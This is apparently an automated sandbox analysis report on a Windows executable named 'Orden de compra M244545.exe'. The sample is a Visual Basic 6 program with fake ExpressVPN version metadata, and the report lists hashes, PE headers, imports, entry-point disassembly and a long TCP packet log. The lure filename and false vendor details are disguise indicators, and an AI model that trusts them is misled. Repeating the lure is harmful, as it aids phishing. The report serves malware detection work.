TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Orden de compra M244545.exe
File size:	98304
MD5:	7c04ecf5dc6999877e87cf9c1c933a3f
SHA1:	905c177e8ea3a2173e322c13b25cd156bd6dea39
SHA256:	cf7bd1c802c044a777529246743d3a5c907e4c02a29525afe2c48daee9b2fd9d
SHA512:	125d0c2e70138bac0c6fb7416085b993c24ed67a8881be2b5f6a9361f4814dbd0084b99b182d7275d02ee0dcb877b8ad5c04f7711a454abf7359c5ef4aaf8459
SSDEEP:	1536:tNDLZynUIR5qVCSbwmNYDsbYFSrZbQFsnD+IjDlD:tNB7U5qVC8wkkFg73jDl
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.......................*..............Rich....................PE..L......K.................@...0...............P....@........

File Icon


Icon Hash:	69e1c892f664c884

Static PE Info

General
Entrypoint:	0x4012b4
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x4BCDC590 [Tue Apr 20 15:17:36 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	3d3cd1bd8dcc611a5734bf41f4e1a6a6

Entrypoint Preview

Instruction
push 0041051Ch
call 00007F2980BFBA33h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
cmp byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
ror dword ptr [ebp+esi-10ACEBBCh], 1
dec ebx
call far A5DAh : 696DB9C0h
stc
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
inc ecx
dec ecx
dec esi
inc esi
dec edi
push edx
pop edx
imul esp, dword ptr [ebp+72h], 0A003473h
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
cmp byte ptr [58E9EFEDh], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x14124	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x16000	0x1c2a	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x230	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0xf0	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x13518	0x14000	False	0.510925292969	data	6.24325085767	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x15000	0xcc4	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x16000	0x1c2a	0x2000	False	0.346069335938	data	3.69516488298	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
CUSTOM	0x1792c	0x2fe	MS Windows icon resource - 1 icon, 32x32, 16 colors	English	United States
CUSTOM	0x1706e	0x8be	MS Windows icon resource - 1 icon, 32x32, 8 bits/pixel	English	United States
CUSTOM	0x16d70	0x2fe	MS Windows icon resource - 1 icon, 32x32, 16 colors, 4 bits/pixel	English	United States
RT_ICON	0x164c8	0x8a8	data
RT_GROUP_ICON	0x164b4	0x14	data
RT_VERSION	0x161a0	0x314	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaVarTstLt, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaVarAdd, __vbaVarDup, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0409 0x04b0
LegalCopyright	ExpressVPN
InternalName	REMEMBERER
FileVersion	4.00
CompanyName	ExpressVPN
LegalTrademarks	ExpressVPN
Comments	ExpressVPN
ProductName	ExpressVPN
ProductVersion	4.00
FileDescription	ExpressVPN
OriginalFilename	REMEMBERER.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 14, 2021 04:15:47.597313881 CEST	49780	443	192.168.11.20	172.217.168.46
Oct 14, 2021 04:15:47.597330093 CEST	443	49780	172.217.168.46	192.168.11.20
Oct 14, 2021 04:15:47.597592115 CEST	49780	443	192.168.11.20	172.217.168.46
Oct 14, 2021 04:15:47.609925985 CEST	49780	443	192.168.11.20	172.217.168.46
Oct 14, 2021 04:15:47.609935999 CEST	443	49780	172.217.168.46	192.168.11.20
Oct 14, 2021 04:15:47.646533012 CEST	443	49780	172.217.168.46	192.168.11.20
Oct 14, 2021 04:15:47.646771908 CEST	49780	443	192.168.11.20	172.217.168.46
Oct 14, 2021 04:15:47.646914959 CEST	49780	443	192.168.11.20	172.217.168.46
Oct 14, 2021 04:15:47.647135973 CEST	443	49780	172.217.168.46	192.168.11.20
Oct 14, 2021 04:15:47.647396088 CEST	49780	443	192.168.11.20	172.217.168.46
Oct 14, 2021 04:15:47.821963072 CEST	49780	443	192.168.11.20	172.217.168.46
Oct 14, 2021 04:15:47.822685957 CEST	443	49780	172.217.168.46	192.168.11.20
Oct 14, 2021 04:15:47.823004961 CEST	49780	443	192.168.11.20	172.217.168.46
Oct 14, 2021 04:15:47.828558922 CEST	49780	443	192.168.11.20	172.217.168.46
Oct 14, 2021 04:15:47.869894981 CEST	443	49780	172.217.168.46	192.168.11.20
Oct 14, 2021 04:15:48.310708046 CEST	443	49780	172.217.168.46	192.168.11.20
Oct 14, 2021 04:15:48.310936928 CEST	443	49780	172.217.168.46	192.168.11.20
Oct 14, 2021 04:15:48.311151028 CEST	49780	443	192.168.11.20	172.217.168.46
Oct 14, 2021 04:15:48.311183929 CEST	49780	443	192.168.11.20	172.217.168.46
Oct 14, 2021 04:15:48.311197996 CEST	443	49780	172.217.168.46	192.168.11.20
Oct 14, 2021 04:15:48.311389923 CEST	49780	443	192.168.11.20	172.217.168.46
Oct 14, 2021 04:15:48.368861914 CEST	49780	443	192.168.11.20	172.217.168.46
Oct 14, 2021 04:15:48.368880987 CEST	443	49780	172.217.168.46	192.168.11.20
Oct 14, 2021 04:15:48.445447922 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.445466042 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.445636988 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.445991039 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.446002007 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.478605986 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.478737116 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.478841066 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.479401112 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.479671955 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.483174086 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.483345985 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.483500004 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.484282970 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.526016951 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.854543924 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.854717970 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.854800940 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.854846001 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.854929924 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.854965925 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.855027914 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.855061054 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.855115891 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.855142117 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.855356932 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.855654955 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.855851889 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.855895042 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.855906963 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.856131077 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.856362104 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.859510899 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.859743118 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.862386942 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.862570047 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.862620115 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.862919092 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.865325928 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.865575075 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.865614891 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.865772963 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.865792990 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.865814924 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.865952015 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.865973949 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.866023064 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.866229057 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.866242886 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.866267920 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.866395950 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.866424084 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.866445065 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.866674900 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.867353916 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.867532969 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.867573977 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.867769957 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.867827892 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.867980003 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.868096113 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.868238926 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.868269920 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.868546963 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.868604898 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.868839025 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.869071007 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.869230032 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.869265079 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.869508982 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.869565964 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.869779110 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.869824886 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.869976044 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.870019913 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.870233059 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.870289087 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.870496988 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.870806932 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.870968103 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.871002913 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.871148109 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.871186018 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.871421099 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.871603012 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.871781111 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.871937990 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.871994019 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.872005939 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.872242928 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.873265982 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.873465061 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.873495102 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.873517990 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.873663902 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.873703003 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.873965979 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.874202967 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.874254942 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.874521017 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.876319885 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.876507044 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.876569033 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.876605988 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.876671076 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.876786947 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.876869917 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.876899004 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.876949072 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.877038956 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.877067089 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.877083063 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.877307892 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.877356052 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.877531052 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.877676964 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.877863884 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.877872944 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.877911091 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.878024101 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.878050089 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.878067970 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.878273964 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.878498077 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.878652096 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.878676891 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.878695011 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.878900051 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.878946066 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.879127979 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.879317999 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.879477978 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.879498959 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.879520893 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.879635096 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.879657030 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.879673004 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.879880905 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.880108118 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.880264044 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.880294085 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.880398989 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.880470991 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.880503893 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.880609989 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.880788088 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.881007910 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.881156921 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.881349087 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.881494999 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.881524086 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.881623983 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.881701946 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.881722927 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.881737947 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.881794930 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.881880999 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.882179022 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.882354021 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.882375956 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.882395983 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.882533073 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.882560968 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.882579088 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.882726908 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.882911921 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.883070946 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.883093119 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.883200884 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.883306026 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.883331060 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.883394003 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.883474112 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.883716106 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.883874893 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.883944035 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.883969069 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.884022951 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.884089947 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.884119987 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.884140968 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.884267092 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.884347916 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.884639978 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.884790897 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.884803057 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.884826899 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.884960890 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.884985924 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.885113955 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.885210991 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.885231972 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.885261059 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.885282993 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.885369062 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.885462046 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.887396097 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.887561083 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.887689114 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.887736082 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.887763977 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.887883902 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.887973070 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.888139009 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.888174057 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.888338089 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.888381958 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.888413906 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.888488054 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.888567924 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.888591051 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.888731003 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.888731956 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.888760090 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.888866901 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.888894081 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.888900042 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.888912916 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.889054060 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.889071941 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.889089108 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.889199018 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.889249086 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.889329910 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.889369011 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.889389038 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.889421940 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.889494896 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.889578104 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.889585018 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.889609098 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.889738083 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.889753103 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.889790058 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.889883995 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.890060902 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.890125990 CEST	49781	443	192.168.11.20	142.250.185.193
Oct 14, 2021 04:15:48.890149117 CEST	443	49781	142.250.185.193	192.168.11.20
Oct 14, 2021 04:15:48.890260935 CEST	49781	443	192.168.11.20	142.250.185.193
